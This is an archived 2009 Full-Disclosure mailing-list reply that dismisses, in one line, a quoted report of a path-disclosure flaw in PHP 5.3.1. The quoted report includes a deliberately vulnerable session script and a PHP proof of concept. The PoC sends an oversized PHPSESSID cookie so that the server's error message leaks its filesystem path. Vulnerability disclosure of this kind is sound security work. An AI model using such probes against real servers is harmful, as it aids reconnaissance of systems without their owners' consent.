| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <64fcd9050912262201m5a5eb9e5v7d694f94a203627c@mail.gmail.com>
Date: Sun, 27 Dec 2009 17:01:59 +1100
From: Jeff Williams <jeffwillis30@...il.com>
To: WHK <www.kernel32@...il.com>, full-disclosure@...ts.grok.org.uk
Subject: Re: Path disclosure in PHP 5.3.1
Oh no a full path !
2009/12/27 WHK <www.kernel32@...il.com>
> Make a script vulnerable:
> <?php
> session_start();
> if($_SESSION)
> echo $_SESSION;
> else
> $_SESSION = 'xx';
> ?>
>
> Now look the script in you explorer and change the value of cookie
> "PHPSESSID" to 300 chars "a" and look the disclosure:
> Warning: session_start() [function.session-start]:
> open(/tmp/sess_aaaaaaaaaaaaaaaaaa ..... aa in /opt/lampp/htdocs/test.php
> on line 3
>
> PoC:
> <?php
> error_reporting(0);
>
> $payload =
> 'GET / HTTP/1.1
> Host: 127.0.0.1
> Connection: close
> Cookie: PHPSESSID='.str_repeat('a', 500).';
>
> ';
>
> if(!$handle = fsockopen('127.0.0.1', 80)){
> die('Error');
> }else{
> fputs($handle, $payload);
> while(!feof($handle)){
> $retorno .= fread($handle, 1024);
> }
> echo nl2br(htmlspecialchars($retorno, ENT_QUOTES));
> }
> ?>
>
> if value of cookie is "aaaaaaa" then file in temp of server is
> "sess_aaaaaaa", if value of cookie is ax300 dont make file and return
> the error message.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists